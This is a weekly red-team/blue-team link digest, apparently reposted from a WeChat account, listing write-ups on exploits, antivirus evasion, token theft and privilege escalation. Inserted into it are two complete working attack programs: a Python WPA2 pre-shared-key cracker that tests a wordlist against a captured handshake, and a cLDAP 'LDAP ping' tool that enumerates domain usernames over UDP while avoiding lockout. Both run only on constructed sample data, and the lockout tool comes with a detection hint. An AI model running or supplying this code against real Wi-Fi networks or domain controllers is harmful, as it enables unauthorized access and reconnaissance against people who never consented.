Weekly Blue Team Technical Digest (2022.9.17-9.23)
2022-9-23 18:01:25 Author: M01N Team

Web Security

fastjson 1.2.80 vulnerability analysis

https://y4er.com/posts/fastjson-1.2.80/

BCS2022: Exploring JNDI attacks

https://github.com/iSafeBlue/presentation-slides/blob/main/BCS2022-%E6%8E%A2%E7%B4%A2JNDI%E6%94%BB%E5%87%BB.pdf

Exploiting Web3's hidden attack surface: universal XSS in Netlify's Next.js library

https://samcurry.net/universal-xss-on-netlifys-next-js-library/

Internal Network Penetration

BloodHound focuses on Active Directory but has blind spots in real-world environments

https://blog.syss.com/posts/bloodhound-blindspots/

Stealing access tokens from Office desktop applications

https://mrd0x.com/stealing-tokens-from-office-applications/

Cracking WPA/WPA2 pre-shared keys from a live network with aircrack-ng

https://tbhaxor.com/cracking-wpa-psk-using-aircrack/
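As an added example (not code from the linked post or from aircrack-ng), the offline half of the attack the post walks through: once a 4-way handshake has been captured, each candidate passphrase is turned into a PMK with PBKDF2-HMAC-SHA1 over the SSID, expanded to a PTK with the 802.11 PRF over both MAC addresses and both nonces, and the first 16 bytes (the KCK) are used to recompute the MIC of EAPOL message 2; a match means the candidate is the PSK. The SSID, MAC addresses, nonces and EAPOL frame below are constructed, not captured, and the network name `ExampleNet` is an assumption.

```python
# Added example (not from the linked post, and not aircrack-ng's code): the offline part
# of a WPA2-PSK attack, i.e. what aircrack-ng does with a captured 4-way handshake.
# Every input here is constructed (SSID, MACs, nonces, EAPOL frame); nothing is a real capture.
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..4, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(5)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MACs and both nonces (each pair ordered, smaller value first)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


MIC_OFFSET = 81  # EAPOL header (4) + EAPOL-Key fields preceding the Key MIC (77)


def eapol_mic(kck: bytes, eapol_frame: bytes, descriptor_version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with the MIC field zeroed: v1 = HMAC-MD5 (WPA), v2 = HMAC-SHA1-128 (WPA2)."""
    frame = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if descriptor_version == 1:
        return hmac.new(kck, frame, hashlib.md5).digest()
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def crack_psk(hs: dict, wordlist) -> Optional[str]:
    """Return the first candidate whose recomputed MIC matches the captured one, else None."""
    captured_mic = hs["eapol_m2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol_m2"], hs["version"]), captured_mic):
            return candidate
    return None


def make_sample_handshake(passphrase: str) -> dict:
    """Constructed WPA2 handshake (message 2 only) for a network protected by `passphrase`."""
    ssid = "ExampleNet"  # assumed network name
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_info = (0x010A).to_bytes(2, "big")  # descriptor version 2, pairwise, MIC present
    body = (b"\x02" + key_info + b"\x00\x00" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    frame = frame[:MIC_OFFSET] + eapol_mic(kck, frame, 2) + frame[MIC_OFFSET + 16:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol_m2": frame, "version": 2}


if __name__ == "__main__":
    hs = make_sample_handshake("password123")
    print(crack_psk(hs, ["letmein", "qwerty", "password123", "hunter2"]))
```

The 4096-round PBKDF2 is the whole cost of the attack; the PTK derivation and MIC check are cheap, which is why the PMK is the value precomputed in rainbow tables per SSID and why a long, random PSK on a non-default SSID is the defence.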

GetMail: reading Exchange mail with an NTLM hash

https://github.com/b0bac/GetMail

ldapnomnom: anonymously brute-forcing domain usernames from a DC by abusing LDAP Ping requests (cLDAP)

https://github.com/lkarlslund/ldapnomnom
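As an added example (not ldapnomnom's code), the primitive the tool abuses: an unauthenticated cLDAP "LDAP ping" (MS-ADTS 6.3.3) over UDP/389 that names an account in its filter. The DC answers with a netlogon blob whose Opcode is LOGON_SAM_LOGON_RESPONSE_EX for an existing account and LOGON_SAM_USER_UNKNOWN_EX otherwise, so one datagram per candidate tells you whether the username exists. The block builds the request with a minimal BER encoder, parses a reply, and classifies it; the filter elements (NtVer, User) follow MS-ADTS and ldapnomnom's own filter may add more, and the reply used in the test is constructed, not a capture.

```python
# Added example (not ldapnomnom's code): build a cLDAP "LDAP ping" that names a user and
# read the Opcode out of the DC's netlogon reply. Filter elements follow MS-ADTS 6.3.3;
# ldapnomnom's own filter may differ. The sample reply below is constructed, not captured.
import socket
from typing import Optional


# --- just enough BER for an LDAP SearchRequest / SearchResultEntry ---
def _ber_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(body)) + body


def octet_string(v) -> bytes:
    return tlv(0x04, v if isinstance(v, bytes) else v.encode())


def integer(n: int, tag: int = 0x02) -> bytes:
    """Non-negative INTEGER (0x02) or ENUMERATED (0x0A)."""
    return tlv(tag, n.to_bytes((n.bit_length() + 8) // 8, "big"))


def equality(attr: str, value: bytes) -> bytes:
    return tlv(0xA3, octet_string(attr) + octet_string(value))  # Filter.equalityMatch [3]


def ber_decode(data: bytes, pos: int = 0):
    """Decode one TLV into ((tag, value), next_pos); constructed values become lists of children."""
    tag, length = data[pos], data[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    end = pos + length
    if tag & 0x20:
        items = []
        while pos < end:
            item, pos = ber_decode(data, pos)
            items.append(item)
        return (tag, items), end
    return (tag, data[pos:end]), end


# --- LDAP ping (MS-ADTS 6.3.3) ---
NETLOGON_NT_VERSION_5, NETLOGON_NT_VERSION_5EX = 0x2, 0x4
LOGON_SAM_LOGON_RESPONSE_EX, LOGON_SAM_USER_UNKNOWN_EX = 23, 25  # Opcode values, MS-ADTS 6.3.1


def build_ldap_ping(username: str, message_id: int = 1) -> bytes:
    """SearchRequest on the rootDSE, base scope, filter (&(NtVer=...)(User=<name>)), attribute netlogon."""
    ntver = (NETLOGON_NT_VERSION_5 | NETLOGON_NT_VERSION_5EX).to_bytes(4, "little")
    flt = tlv(0xA0, equality("NtVer", ntver) + equality("User", username.encode()))  # Filter.and [0]
    search = tlv(0x63,                              # [APPLICATION 3] SearchRequest
                 octet_string(b"")                  # baseObject: rootDSE
                 + integer(0, 0x0A)                 # scope: baseObject
                 + integer(0, 0x0A)                 # derefAliases: neverDerefAliases
                 + integer(0) + integer(0)          # sizeLimit, timeLimit
                 + tlv(0x01, b"\x00")               # typesOnly: FALSE
                 + flt
                 + tlv(0x30, octet_string("netlogon")))
    return tlv(0x30, integer(message_id) + search)


def netlogon_opcode(reply: bytes) -> Optional[int]:
    """First uint16 (little-endian) of the netlogon attribute in a SearchResultEntry, or None."""
    (_, message), _ = ber_decode(reply)
    for op_tag, op in message[1:]:
        if op_tag != 0x64:  # [APPLICATION 4] SearchResultEntry
            continue
        for _, partial_attr in op[1][1]:
            name, values = partial_attr[0][1], partial_attr[1][1]
            if name.lower() == b"netlogon" and values:
                return int.from_bytes(values[0][1][:2], "little")
    return None


def classify(reply: bytes) -> str:
    op = netlogon_opcode(reply)
    if op == LOGON_SAM_LOGON_RESPONSE_EX:
        return "exists"
    if op == LOGON_SAM_USER_UNKNOWN_EX:
        return "unknown"
    return "other(%r)" % op


def sample_reply(opcode: int, message_id: int = 1) -> bytes:
    """Constructed SearchResultEntry carrying a truncated NETLOGON_SAM_LOGON_RESPONSE_EX blob."""
    blob = opcode.to_bytes(2, "little") + b"\x00\x00" + b"\x00" * 20  # Opcode, Sbz, Flags, DomainGuid
    attr = tlv(0x30, octet_string("netlogon") + tlv(0x31, octet_string(blob)))
    entry = tlv(0x64, octet_string(b"") + tlv(0x30, attr))
    return tlv(0x30, integer(message_id) + entry)


def ldap_ping(dc: str, username: str, timeout: float = 2.0) -> str:
    """Send one ping over UDP/389 and classify the answer (needs network reachability to a DC)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_ldap_ping(username), (dc, 389))
        data, _ = s.recvfrom(4096)
    return classify(data)
```

Because the exchange is one UDP datagram each way with no bind, the DC records no logon failure and the account lockout policy never applies; the detection opportunity is volume, so a burst of cLDAP queries to port 389 with distinct User values from one source is the signature to hunt for.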

Endpoint Evasion

Evading WinDefender ATP credential-theft detection: kernel version

https://b4rtik.github.io/posts/evading-windefender-atp-credential-theft-kernel-version/

Building an AV-evading loader with GraalVM

https://xie.infoq.cn/article/ee227650630be0e362b161333

MasqueradingPEB: masquerading as a legitimate Windows binary by changing certain fields in the PEB structure

https://github.com/D1rkMtr/MasqueradingPEB

ExecRemoteAssembly: remote .NET assembly execution with argument passing, patching AMSI and ETW to evade detection

https://github.com/D1rkMtr/ExecRemoteAssembly

Monikers, COM's extensible name-resolution interface: a moniker parses a display name and returns the actual object the client is trying to locate

https://scorpiosoftware.net/2022/09/18/introduction-to-monikers/

https://github.com/zodiacon/MonikerFun

Codecepticon: a .NET tool that obfuscates C#, VBA/VB6 (macro), and PowerShell code

https://github.com/Accenture/Codecepticon

macOS security mechanisms and attack techniques

https://www.securing.pl/en/presentation/0-day-up-your-sleeve-attacking-macos-environments/

DylibHijackTest: discovering DYLD_INSERT_LIBRARIES hijacking on macOS

https://github.com/slyd0g/DylibHijackTest

Vulnerabilities

From leaking TheHole to Chrome renderer RCE

https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078

CVE-2022-36804: Bitbucket Server command injection vulnerability analysis

https://www.anquanke.com/post/id/280193

https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/

Abusing handle duplication in the Process Explorer driver for kernel code execution

https://www.elastic.co/cn/security-labs/stopping-vulnerable-driver-attacks

CVE-2022-37706: Ubuntu 22.04 privilege-escalation exploit

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

CVE-2022-40286: getting a SYSTEM shell via a Seagate service

https://www.x86matthew.com/view_post?id=windows_seagate_lpe

ANGRYORCHARD: abusing NtUserHardErrorControl to elevate a thread to KernelMode for arbitrary kernel read/write on Windows 7-11

https://github.com/SecIdiot/ANGRYORCHARD

Cloud Security

Azure Cloud Shell command injection to steal users' access tokens

https://blog.lightspin.io/azure-cloud-shell-command-injection-stealing-users-access-tokens

AttachMe: an OCI vulnerability allowing unauthorized access to customers' cloud storage volumes

https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access

CloudFox: situational awareness for cloud environments, helping find exploitable attack paths in cloud infrastructure

https://github.com/BishopFox/cloudfox

Teamsniper: scraping sensitive information from Microsoft Teams

https://github.com/xRET2pwn/Teamsniper

Other

Analysis and reproduction of a macOS watering-hole attack chain

https://tttang.com/archive/1745/

Review report on the use of automated OSINT by the Dutch General Intelligence and Security Service (AIVD) and Military Intelligence and Security Service (MIVD)

https://english.ctivd.nl/documents/review-reports/2022/09/19/index

M01N Team official account

Focused on hot topics in advanced offense-defense research

NSFOCUS Blue Team Research Squad


Previous issues

Weekly Blue Team Technical Digest (2022.9.10-9.16)

Weekly Blue Team Technical Digest (2022.9.3-9.9)

Weekly Blue Team Technical Digest (2022.8.27-9.2)


Source: http://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247489743&idx=1&sn=398486d455f8a35870e9c9700ba73188&chksm=c187d8def6f051c8cd77ef63ee8edb4948ab7ecd6f119d0d6fb3429fc430cd1d5962ea2f195b#rd